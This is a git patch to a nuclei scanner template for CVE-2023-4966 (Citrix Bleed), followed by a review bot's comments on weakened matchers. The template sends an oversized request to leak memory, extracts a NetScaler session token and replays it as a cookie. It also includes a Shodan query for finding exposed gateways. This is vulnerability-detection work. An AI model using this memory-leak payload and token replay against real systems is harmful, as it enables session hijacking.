From 349183fafc2e812b052375295f1397fa68eb9bca Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 18 Nov 2023 15:43:37 +0530 Subject: [PATCH] Update CVE-2023-4966.yaml --- http/cves/2023/CVE-2023-4966.yaml | 25 +++++++------------------ 1 file changed, 7 insertions(+), 18 deletions(-) diff --git a/http/cves/2023/CVE-2023-4966.yaml b/http/cves/2023/CVE-2023-4966.yaml index cd96a7de238..de962e2e0fc 100644 --- a/http/cves/2023/CVE-2023-4966.yaml +++ b/http/cves/2023/CVE-2023-4966.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-4966 cwe-id: CWE-119,NVD-CWE-noinfo epss-score: 0.92267 - epss-percentile: 0.98699 + epss-percentile: 0.98701 cpe: cpe:2.3:a:citrix:netscaler_application_delivery_controller:*:*:*:*:fips:*:*:* metadata: verified: "true" @@ -26,7 +26,8 @@ info: vendor: citrix product: netscaler_application_delivery_controller shodan-query: title:"Citrix Gateway" || title:"Netscaler Gateway" - tags: cve,2023,citrix,adc,info-leak,kev + tags: cve,cve2023,citrix,adc,info-leak,kev,exposure + variables: payload: '{{repeat("a", 24812)}}' str: "{{to_lower(rand_text_alpha(4))}}" @@ -42,41 +43,29 @@ http: POST /logon/LogonPoint/Authentication/GetUserName HTTP/1.1 Host: {{Hostname}} Cookie: NSC_AAAC={{session}} - User-Agent: python-requests/2.25.1 - Accept-Encoding: gzip, deflate, br - Accept: */* - Connection: close - Content-Length: 0 - unsafe: true - extractors: - type: regex name: session part: body_1 group: 1 regex: - - \b([a-f0-9]{65})\b + - '([a-f0-9]{100}45525d5f4f58455e445a4a42)' internal: true - type: regex part: body_2 regex: - - '([a-z0-9]+)' + - '([a-z0-9._]+)' matchers-condition: and matchers: - type: word - part: body_1 words: - 'NSC_AAAC=' - - '{"issuer":' - condition: and + - 'HTTP/1.1' - type: word - part: header_2 words: - - "text/plain" - -# digest: 490a0046304402207db62b78d725e5835d539a432bbaa606647070f975c036210b895293b64bddc40220565ccd7d916d95908b020076aa1c8c751cf93be538acee8aa9c5b72e7e9346fd:922c64590222798bb761d5b6d8e72950 + - '{"issuer":'
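Review bot: In the last hunk (`@@ -42,41 +43,29 @@`) both word matchers lose their `part:` scoping and the first also loses `condition: and`, so what each word list is checked against, and whether all words are required, now rests on nuclei defaults rather than on the template. As far as I know an omitted `condition` means OR and an omitted `part` means the plain response body, which would let the first matcher pass on `HTTP/1.1` alone and makes a false positive on a patched gateway more likely. I would keep the intent explicit: `part: body_1` with `condition: and` on the `NSC_AAAC=` / `HTTP/1.1` matcher, and `part: body_1` on the `{"issuer":` matcher, which is where the removed lines looked for it. With the `header_2` / `text/plain` matcher removed, nothing visible in the hunk ties a match to the second response any more, while the widened extractor `([a-z0-9._]+)` will report almost any lowercase token from `body_2`. The `http:` block starts above this hunk, so the first request is not visible here.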